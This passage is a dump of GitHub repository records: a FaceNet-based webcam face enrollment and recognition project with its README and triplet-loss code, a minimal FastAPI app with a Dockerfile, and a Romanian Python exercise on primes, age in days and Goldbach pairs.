exists!!\".format(args.name))\n print(\"Press 'C' to overwrite or 'R' to return\")\n val = input(\"Enter response:\")\n if val == 'r' or val == 'R':\n return\n elif val == 'c' or val == 'C':\n cv2.imwrite(image_path, image)\n print(\"image saved\")\n else:\n cv2.imwrite(image_path, image)\n print(\"image saved _\")\n\n FRmodel = faceRecoModel(input_shape=(3, 96, 96))\n print(\"Total Params:\", FRmodel.count_params())\n\n # load trained model\n FRmodel.compile(optimizer='adam', loss=triplet_loss, metrics=['accuracy'])\n load_weights_from_FaceNet(FRmodel)\n\n embedding = img_to_encoding(image_path, FRmodel)[0].tolist()\n print(type(embedding))\n print(embedding)\n print(len(embedding))\n print(\"embedding created\")\n\n try:\n with open(embedding_path, 'r') as rf:\n base_emb = json.load(rf)\n except IOError:\n print(\"Embeddibg file empty!! Creating a new embedding file\")\n with open(embedding_path, 'w+') as rf:\n base_emb = {}\n with open(embedding_path, 'w') as wf:\n base_emb[args.name] = embedding\n json.dump(base_emb, wf)\n print(\"embedding written\")\n\n print(\"face enrolled with name => {}\".format(args.name))\n\n\ndef parse_arguments(argv):\n\n parser = argparse.ArgumentParser()\n\n parser.add_argument('name',\n type=str,\n help='Add the name of member to be added.')\n\n return parser.parse_args(argv)\n\nif __name__ == '__main__':\n main(parse_arguments(sys.argv[1:]))\n" }, { "alpha_fraction": 0.5926156044006348, "alphanum_fraction": 0.6099907159805298, "avg_line_length": 55.543861389160156, "blob_id": "a4192ebfc34f92ff5b65673fbdc0a022c1a4161d", "content_id": "f06e0e6f68c7c66aa7801fa97906d47fe43c111d", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 6446, "license_type": "permissive", "max_line_length": 398, "num_lines": 114, "path": "/README.md", "repo_name": "SHANK885/realtime_face_recognition", "src_encoding": "UTF-8", "text": "---------------------------------------------------------------------------------------------------\n# Realtime Face Recognition\n\nFace recognition problems commonly fall into two categories:\n\n * Face Verification - \"is this the claimed person?\". For example, at some airports, you can pass through customs by letting a system scan your passport and then verifying that you (the person carrying the passport) are the correct person. A mobile phone that unlocks using your face is also using face verification. This is a 1:1 matching problem.\n * Face Recognition - \"who is this person?\". This is a 1:K matching problem.\n \nFaceNet learns a neural network that encodes a face image into a vector of 128 numbers. By comparing two such vectors, you can then determine if two pictures are of the same person.\n\n--------------------------------------------------------------------------------------------------\n### Encoding face images into a 128-dimensional vector\n\n--------------------------------------------------------------------------------------------------\n#### Using an ConvNet to compute encodings\n\n\nThe FaceNet model takes a lot of data and a long time to train. So following common practice in applied deep learning settings, let's just load weights that someone else has already trained. The network architecture follows the Inception model from [Szegedy et al.](https://arxiv.org/abs/1409.4842). We have provided an inception network implementation. You can look in the file inception_blocks.py\n\nThe key things you need to know are:\n\n * This network uses 96x96 dimensional RGB images as its input. Specifically, inputs a face image (or batch of m face images) as a tensor of shape (m, n_C, n_H, n_W) = (m, 3, 96, 96)\n * It outputs a matrix of shape (m, 128) that encodes each input face image into a 128-dimensional vector\n\n--------------------------------------------------------------------------------------------------\n#### Expected Output\n\nBy using a 128-neuron fully connected layer as its last layer, the model ensures that the output is an encoding vector of size 128. You then use the encodings the compare two face images as follows:\n\n\n<p align=\"center\"><img width=\"100%\" src=\"https://github.com/SHANK885/realtime_face_recognition/blob/master/images/distance_kiank.png\" /></p>\n\nSo, an encoding is a good one if:\n\n * The encodings of two images of the same person are quite similar to each other\n * The encodings of two images of different persons are very different\n\nThe triplet loss function formalizes this, and tries to \"push\" the encodings of two images of the same person (Anchor and Positive) closer together, while \"pulling\" the encodings of two images of different persons (Anchor, Negative) further apart.\n\n<p align=\"center\"><img width=\"100%\" src=\"https://github.com/SHANK885/realtime_face_recognition/blob/master/images/triplet_comparison.png\" /></p>\n\n\n--------------------------------------------------------------------------------------------------\n### Platform Secification:\n\n * Ubuntu 18.04\n\n\n--------------------------------------------------------------------------------------------------\n### Requirements:\n \n * tensorflow==1.15.0\n * sklearn==0.21.3\n * Python==3.7.4\n * OpenCV==4.1.2\n * NumPy==1.17.2\n \n \n-------------------------------------------------------------------------------------------------- \n### Setup\n\n * Clone this [repository](https://github.com/SHANK885/realtime_face_recognition.git)\n \n \n-------------------------------------------------------------------------------------------------- \n### Enroll a new face using webcam.\n\n 1. Go inside realtime_face_recognition directory.\n 2. run \"python enroll_face.py <name_of_new_member>\n 3. Webcam will open up with a window to capture face.\n 4. Press 's' by selectiong the video window to capture the image.\n 5. If you want to recapture the image:\n select the terminal window and enter \"R\" or \"r\" else enter \"C\" or \"c\".\n\n It will enroll the new face with the name provided in the command line.\n\n \n The cropped and aligned face will be saved to:\n realtime_face_recognition/database/images/ directory\n \n The 128 D face embedding vector will be added to:\n realtime_face_recognition/database/embeddings/face_embeddings.json\n\n\n--------------------------------------------------------------------------------------------------\n### Where the image is stored ?\n\n * The cropped faces of all te enrolled members is stored in:\n [realtime_face_recognition/database/images/ directory](https://github.com/SHANK885/realtime_face_recognition/tree/master/database/images)\n * The embeddings of all the enrolled faces is present in:\n [realtime_face_recognition/database/embeddings/<emb> directory](https://github.com/SHANK885/realtime_face_recognition/tree/master/database/embeddings)\n \n \n--------------------------------------------------------------------------------------------------\n### What is does?\n\nOur realtime face recognition is able to recognize the faces of all the members that is enrolled in the database. However, if a face is not enrolled it will make it as unknown.\n\n\n--------------------------------------------------------------------------------------------------\n### How to run FaceNet Realtime Recognition.\n\n * Enroll the faces you want by following the above steps.\n * Go to the realtime_face_recognition directory.\n * run realtime_recognition.py.\n * It will be able to recognize the faces that are present in the database and will mark a face unknown if it is not registered.\n \n--------------------------------------------------------------------------------------------------\n### References\n\n * Florian Schroff, Dmitry Kalenichenko, James Philbin (2015). [FaceNet: A Unified Embedding for Face Recognition and Clustering](https://arxiv.org/pdf/1503.03832.pdf)\n * Yaniv Taigman, Ming Yang, Marc'Aurelio Ranzato, Lior Wolf (2014). [DeepFace: Closing the gap to human-level performance in face verification](https://research.fb.com/wp-content/uploads/2016/11/deepface-closing-the-gap-to-human-level-performance-in-face-verification.pdf)\n * The pretrained model we use is inspired by Victor Sy Wang's implementation and was loaded using his code: [https://github.com/iwantooxxoox/Keras-OpenFace](https://github.com/iwantooxxoox/Keras-OpenFace)\n * Our implementation also took a lot of inspiration from the official FaceNet github repository: [https://github.com/davidsandberg/facenet](https://github.com/davidsandberg/facenet)\n" }, { "alpha_fraction": 0.5542551279067993, "alphanum_fraction": 0.574092447757721, "avg_line_length": 31.947711944580078, "blob_id": "f93cd90b8c38d24b35dab04bb84751aaca65abc0", "content_id": "d4331c16ea10a0efef56c5ab8bf65bb982fadd30", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5049, "license_type": "permissive", "max_line_length": 114, "num_lines": 153, "path": "/realtime_recognition.py", "repo_name": "SHANK885/realtime_face_recognition", "src_encoding": "UTF-8", "text": "from keras.models import Sequential\nfrom keras.layers import Conv2D, ZeroPadding2D, Activation, Input, concatenate\nfrom keras.models import Model\nfrom keras.layers.normalization import BatchNormalization\nfrom keras.layers.pooling import MaxPooling2D, AveragePooling2D\nfrom keras.layers.merge import Concatenate\nfrom keras.layers.core import Lambda, Flatten, Dense\nfrom keras.initializers import glorot_uniform\nfrom keras.engine.topology import Layer\nfrom keras import backend as K\n\nK.set_image_data_format('channels_first')\nimport cv2\nimport json\nimport os\nimport numpy as np\nfrom numpy import genfromtxt\nimport pandas as pd\nimport tensorflow as tf\nfrom fr_utils import *\nfrom triplet_loss import triplet_loss\nfrom inception_blocks_v2 import *\n\n\n\ndef create_encoding(image, model):\n img = image[...,::-1]\n img = np.around(np.transpose(img, (2,0,1))/255.0, decimals=12)\n x_train = np.array([img])\n embedding = model.predict_on_batch(x_train)\n return embedding\n\n\n\ndef who_is_it(image_path, database, model):\n \"\"\"\n Arguments:\n image_path -- path to an image\n database -- database containing image encodings along with the name of the person on the image\n model -- your Inception model instance in Keras\n\n Returns:\n min_dist -- the minimum distance between image_path encoding and the encodings from the database\n identity -- string, the name prediction for the person on image_path\n \"\"\"\n\n ### START CODE HERE ###\n\n ## Step 1: Compute the target \"encoding\" for the image. Use img_to_encoding() see example above. ## (≈ 1 line)\n encoding = create_encoding(image_path, model)\n\n ## Step 2: Find the closest encoding ##\n\n # Initialize \"min_dist\" to a large value, say 100 (≈1 line)\n min_dist = 100\n\n # Loop over the database dictionary's names and encodings.\n for (name, db_enc) in database.items():\n\n # Compute L2 distance between the target \"encoding\" and the current \"emb\" from the database. (≈ 1 line)\n dist = np.linalg.norm(encoding-db_enc)\n\n # If this distance is less than the min_dist, then set min_dist to dist, and identity to name. (≈ 3 lines)\n if dist < min_dist:\n min_dist = dist\n identity = name\n\n ### END CODE HERE ###\n\n if min_dist > 0.85:\n print(\"Not in the database.\")\n print(\"distance\", min_dist)\n identity = \"Unknown\"\n else:\n print (\"it's \" + str(identity) + \", the distance is \" + str(min_dist))\n\n return min_dist, identity\n\n\ndef main():\n\n embedding_path = \"./database/embeddings/embeddings.json\"\n face_detector_path = \"./classifiers/haarcascade_frontalface_default.xml\"\n\n FRmodel = faceRecoModel(input_shape=(3, 96, 96))\n print(\"Total Params:\", FRmodel.count_params())\n\n # load trained model\n FRmodel.compile(optimizer='adam', loss=triplet_loss, metrics=['accuracy'])\n load_weights_from_FaceNet(FRmodel)\n\n with open(embedding_path, 'r') as infile:\n database = json.load(infile)\n\n #who_is_it(\"images/camera_0.jpg\", database, FRmodel)\n video_capture = cv2.VideoCapture(0)\n video_capture.set(cv2.CAP_PROP_FRAME_WIDTH, 960)\n video_capture.set(cv2.CAP_PROP_FRAME_HEIGHT, 540)\n\n face_detector = cv2.CascadeClassifier(face_detector_path)\n\n print(\"above while\")\n while True:\n # capture frame\n if video_capture.isOpened():\n ret, frame = video_capture.read()\n\n raw_frame = frame.copy()\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n faces = face_detector.detectMultiScale(gray,\n scaleFactor=1.5,\n minNeighbors=5,\n minSize=(30, 30))\n if len(faces) > 0:\n for (x, y, w, h) in faces:\n cropped = raw_frame[y:y+h, x:x+w]\n image = cv2.resize(cropped,\n (96, 96),\n interpolation=cv2.INTER_LINEAR)\n min_dist, identity = who_is_it(image, database, FRmodel)\n\n if identity == 'Unknown':\n box_color = (0, 0, 255)\n text_color = (0, 0, 255)\n else:\n box_color = (0, 255, 0)\n text_color = (255, 0, 0)\n\n cv2.rectangle(frame,\n (x, y),\n (x+w, y+h),\n box_color,\n 2)\n cv2.putText(frame,\n identity,\n (x, y),\n cv2.FONT_HERSHEY_SIMPLEX,\n 0.75,\n text_color,\n thickness=2,\n lineType=2)\n\n cv2.imshow('Realtime Recognition', frame)\n\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\n video_capture.release()\n cv2.destroyAllWindows()\n\n\nif __name__ == \"__main__\":\n main()\n" }, { "alpha_fraction": 0.616122841835022, "alphanum_fraction": 0.642994225025177, "avg_line_length": 39.07692337036133, "blob_id": "9e5c44aa858b6ce4ee8857d2a2eedc381d6fb6d0", "content_id": "39a7a074d35ced23cfce417b8ac8bd0c7c8059a3", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1563, "license_type": "permissive", "max_line_length": 104, "num_lines": 39, "path": "/triplet_loss.py", "repo_name": "SHANK885/realtime_face_recognition", "src_encoding": "UTF-8", "text": "# triplet loss\nimport tensorflow as tf\n\ndef triplet_loss(y_true, y_pred, alpha=0.2):\n '''\n Arguments:\n y_true -- true labels, required when you define a loss in Keras, you don't need it in this function.\n y_pred -- python list containing three objects:\n anchor -- the encodings for the anchor images, of shape (None, 128)\n positive -- the encodings for the positive images, of shape (None, 128)\n negative -- the encodings for the negative images, of shape (None, 128)\n\n Returns:\n loss -- real number, value of the loss\n '''\n anchor, positive, negative = y_pred[0], y_pred[1], y_pred[2]\n\n # compute the encoding distance between the anchor and the positive,\n # need to sum over the axis -1\n pos_dist = tf.reduce_sum(tf.square(tf.subtract(anchor, positive)))\n # compute the encoding distance between the anchor and the negative\n # need to sum over the axis -1\n neg_dist = tf.reduce_sum(tf.square(tf.subtract(anchor, negative)))\n basic_loss = pos_dist - neg_dist + alpha\n # take the maximum of bsic loss and 0.0 sum over the training examples\n loss = tf.reduce_sum(tf.maximum(basic_loss, 0))\n\n return loss\n\n\nwith tf.Session() as test:\n tf.set_random_seed(1)\n y_true = (None, None, None)\n y_pred = (tf.random_normal([3, 128], mean=6, stddev=0.1, seed=1),\n tf.random_normal([3, 128], mean=1, stddev=1, seed=1),\n tf.random_normal([3, 128], mean=3, stddev=4, seed=1))\n loss = triplet_loss(y_true, y_pred)\n\n print(\"loss = \", str(loss.eval()))\n" } ]
4
aki-06/FastAPI_ML
https://github.com/aki-06/FastAPI_ML
38c76a6b46f9d592a6eb6a56470ee2d1dd087e44
d0ff45be8e363f7be9f748bfd864306d0cf31d58
36dbc19b67c3f1eeb794964b122e9b4b6d096a9d
refs/heads/master
2023-04-27T09:03:30.266949
2020-07-17T14:28:07
2020-07-17T14:28:07
279,079,432
0
0
null
2020-07-12T14:18:07
2020-07-17T14:28:31
2021-05-13T20:59:22
Python
[ { "alpha_fraction": 0.6223404407501221, "alphanum_fraction": 0.6223404407501221, "avg_line_length": 14.75, "blob_id": "dcd8c9821c2d516e823052aad8b5a4188a68c123", "content_id": "dfce51cadac3f02b5e3addcf0ca75e303ab47f9a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 188, "license_type": "no_license", "max_line_length": 28, "num_lines": 12, "path": "/api/src/app.py", "repo_name": "aki-06/FastAPI_ML", "src_encoding": "UTF-8", "text": "from fastapi import FastAPI\n\n\napp = FastAPI()\n\[email protected]('/')\nasync def index():\n return {\"text\": \"Hello\"}\n\[email protected]('/items/{name}')\nasync def get_items(name):\n return {\"name\": name}" }, { "alpha_fraction": 0.7231638431549072, "alphanum_fraction": 0.7401130199432373, "avg_line_length": 21.25, "blob_id": "74ca8f381fbad2f42f3f504fe3b6f2ac6c5f3411", "content_id": "74e524f99dc0f12ecdafaf7775f27908f045d08f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Dockerfile", "length_bytes": 177, "license_type": "no_license", "max_line_length": 35, "num_lines": 8, "path": "/api/Dockerfile", "repo_name": "aki-06/FastAPI_ML", "src_encoding": "UTF-8", "text": "FROM python:3.8\nENV PYTHONUNBUFFERED 1\nRUN mkdir /src\nWORKDIR /src\nCOPY requirements.txt /src\nRUN pip install --upgrade pip && \\\n pip install -r requirements.txt\nCOPY . /src/" } ]
2
AP-MI-2021/lab-2-andreeabejinariu0
https://github.com/AP-MI-2021/lab-2-andreeabejinariu0
f88b604698828507c9ec55bffccc9b9e63244047
998576a9f19455ddec9d76efff4a3047ee29768d
50ec6147e4af9723c8c48c8ed1ed29e1c195e411
refs/heads/main
2023-08-17T15:55:52.193834
2021-10-06T09:19:17
2021-10-06T09:19:17
413,364,496
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5410627722740173, "alphanum_fraction": 0.5696457624435425, "avg_line_length": 33.98591613769531, "blob_id": "bdb400ca991838e102f02781f71478838d42aa50", "content_id": "405f1cb0b1226d8d1e6e09cee2d2a16a9003b5d0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2494, "license_type": "no_license", "max_line_length": 103, "num_lines": 71, "path": "/main.py", "repo_name": "AP-MI-2021/lab-2-andreeabejinariu0", "src_encoding": "UTF-8", "text": "'''\nGăsește ultimul număr prim mai mic decât un număr dat.\n'''\ndef prime(nr):\n if nr < 2:\n return False\n for i in range (2 , nr):\n if nr % i == 0:\n return False\n return True\ndef get_largest_prime_below (nr):\n for i in range (nr-1, 1, -1):\n if prime(i) == True:\n return i\n break\n return False\ndef test_get_largest_prime_below():\n assert get_largest_prime_below(15) == 13\n assert get_largest_prime_below(112) == 109\n assert get_largest_prime_below(41) == 37\n assert get_largest_prime_below(225) == 223\n assert get_largest_prime_below(-4) == False\n\nfrom datetime import datetime as dt\ndef get_age_in_days(birthdate):\n data2 = dt.today().strftime('%d/%m/%Y') #converteste data de azi\n birthdate = dt.strptime(birthdate, '%d/%m/%Y')#converteste data de nastere intr-un sir de caractere\n azi = dt.strptime(data2, '%d/%m/%Y')\n zile = birthdate - azi#diferenta de zile\n return (abs(zile.days))#diferenta in modul exprimata in zile\ndef get_goldbach(n):\n if n % 2 == 1:\n return None\n for p1 in range(1, n // 2, +2):\n if prime(p1):\n p2 = n - p1\n if prime(p2):\n return p1, p2\n break\ndef test_get_goldbach():\n assert get_goldbach(18) == (5 , 13)\n assert get_goldbach(14) == (3, 11)\n assert get_goldbach(42) ==(5, 37)\n assert get_goldbach(20) == (3, 17)\n assert get_goldbach(45) == None\ndef main():\n while True:\n print('1. Găsește ultimul număr prim mai mic decât un număr dat.')\n print('2. Varsta persoanei in zile')\n print('3. Conjunctura lui Goldbach')\n print('x. Iesirea din program - exit')\n optiune = input('Alege optiunea: ')\n if optiune == '1':\n nr = int(input('Dati un numar: '))\n if get_largest_prime_below(nr):\n print(f'Ultimul numar prim mai mic decat {nr} este ',get_largest_prime_below(nr))\n else:\n print(f'Nu exsita numar prim mai mic decat {nr}.')\n elif optiune == '2':\n data1 = str(input(\"Introduceti data nasterii: (dd/mm/yyyy)\"))\n print('Numarul zilelor este de ',get_age_in_days(data1))\n elif optiune == '3':\n n = int(input('Dati un numar: '))\n print(get_goldbach(n))\n elif optiune == 'x':\n break\n else:\n print('Optiune invalida!')\ntest_get_largest_prime_below()\ntest_get_goldbach()\nmain()\n" } ]
1